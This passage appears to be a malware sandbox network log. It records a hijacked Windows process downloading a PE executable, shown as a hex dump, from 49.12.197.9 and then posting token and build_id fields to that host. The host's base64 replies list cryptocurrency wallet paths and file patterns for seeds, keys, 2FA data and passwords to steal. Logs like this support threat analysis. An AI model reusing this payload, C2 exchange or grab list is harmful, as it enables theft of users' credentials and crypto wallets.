                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:18 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:17 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:17 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:18 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                                  Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                                  Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                                  Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                                  Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                                  Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                                  Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                  Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                  Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                  2024-10-03 01:36:18 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                  Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  17192.168.2.64973949.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:20 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 1025
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:20 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------EGCBFIEHIEGCAAAKKKKECont
                                                                                                                                                                  2024-10-03 01:36:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:21 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  18192.168.2.64974049.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:22 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDA
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AAKEGDAKEHJDHIDHJJDACont
                                                                                                                                                                  2024-10-03 01:36:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:22 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:22 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  19192.168.2.64974149.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:23 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:23 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CFIEBKEHCAKFCBFIDAAKCont
                                                                                                                                                                  2024-10-03 01:36:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:24 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:24 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                  Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  20192.168.2.64974349.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:25 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 461
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:25 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AFHDHCAAKECFIDHIEBAKCont
                                                                                                                                                                  2024-10-03 01:36:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:25 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
